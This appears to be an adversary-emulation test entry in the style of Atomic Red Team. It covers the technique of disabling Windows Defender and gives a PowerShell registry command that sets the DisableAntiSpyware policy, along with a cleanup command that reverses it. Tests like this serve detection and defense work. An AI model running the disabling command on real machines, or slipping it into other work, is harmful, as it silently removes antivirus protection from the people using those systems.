#TechniqueName: Impair Defenses: Disable or Modify Tools
#AtomicTestName: Tamper with Windows Defender Registry
#Description: Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be&grayed out and have no info.&
#Language: ps1

#commands
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1


#cleanup_commands
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0

